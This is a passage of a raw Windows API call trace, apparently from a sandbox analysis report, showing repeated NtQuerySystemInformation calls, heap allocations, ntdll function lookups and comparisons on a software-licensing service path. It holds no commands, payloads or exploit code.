ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x20, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x28, ResultLength=0x0) [0229.312] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x28, ResultLength=0x0) [0229.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0229.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0229.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0229.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0229.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x20, ResultLength=0x0) [0229.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x20, ResultLength=0x0) [0229.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x28, ResultLength=0x0) [0229.488] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x28, ResultLength=0x0) [0229.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0229.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x20, ResultLength=0x0) [0229.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x20, ResultLength=0x0) [0229.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x28, ResultLength=0x0) [0229.501] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x28, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0229.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0229.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x20, ResultLength=0x0) [0229.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x20, ResultLength=0x0) [0229.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.520] GetProcessHeap () returned 0x27fc8db0000 [0229.520] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efaf30 [0229.520] GetProcessHeap () returned 0x27fc8db0000 [0229.520] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f4e0 [0229.521] GetProcessHeap () returned 0x27fc8db0000 [0229.521] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x12c) returned 0x27fc8e45a30 [0229.521] GetProcessHeap () returned 0x27fc8db0000 [0229.521] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x138) returned 0x27fc8e29e90 [0229.521] GetProcessHeap () returned 0x27fc8db0000 [0229.521] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x140) returned 0x27fc9f4d900 [0229.521] GetProcessHeap () returned 0x27fc8db0000 [0229.521] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e420 [0229.521] GetProcessHeap () returned 0x27fc8db0000 [0229.521] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x140) returned 0x27fc9f4d270 [0229.521] GetProcessHeap () returned 0x27fc8db0000 [0229.521] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efafe0 [0229.521] GetProcessHeap () returned 0x27fc8db0000 [0229.521] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f7e0 [0229.521] GetProcessHeap () returned 0x27fc8db0000 [0229.521] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f4d900 | out: hHeap=0x27fc8db0000) returned 1 [0229.521] GetProcessHeap () returned 0x27fc8db0000 [0229.521] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1f4) returned 0x27fc8e5dc90 [0229.521] GetProcessHeap () returned 0x27fc8db0000 [0229.521] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xf4) returned 0x27fc9889290 [0229.522] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a67ff1d8 | out: phModule=0xf7a67ff1d8*=0x7ffcea380000) returned 1 [0229.522] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0229.523] GetProcessHeap () returned 0x27fc8db0000 [0229.523] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efa850 [0229.523] GetProcessHeap () returned 0x27fc8db0000 [0229.523] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f5a0 [0229.523] GetProcessHeap () returned 0x27fc8db0000 [0229.523] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x12c) returned 0x27fc8e45a30 [0229.523] GetProcessHeap () returned 0x27fc8db0000 [0229.523] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x138) returned 0x27fc8e29e90 [0229.523] GetProcessHeap () returned 0x27fc8db0000 [0229.523] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x140) returned 0x27fc9f4dcf0 [0229.523] GetProcessHeap () returned 0x27fc8db0000 [0229.523] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8eb60 [0229.523] GetProcessHeap () returned 0x27fc8db0000 [0229.523] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x140) returned 0x27fc9f4dba0 [0229.523] GetProcessHeap () returned 0x27fc8db0000 [0229.523] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efaa60 [0229.524] GetProcessHeap () returned 0x27fc8db0000 [0229.524] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f620 [0229.524] GetProcessHeap () returned 0x27fc8db0000 [0229.524] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f4dcf0 | out: hHeap=0x27fc8db0000) returned 1 [0229.524] GetProcessHeap () returned 0x27fc8db0000 [0229.524] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1f4) returned 0x27fc8e5dc90 [0229.524] GetProcessHeap () returned 0x27fc8db0000 [0229.524] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xfc) returned 0x27fc8e0d740 [0229.524] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a67ff2b8 | out: phModule=0xf7a67ff2b8*=0x7ffcea380000) returned 1 [0229.524] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x50, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x50, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x50, ResultLength=0x0) [0229.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x50, 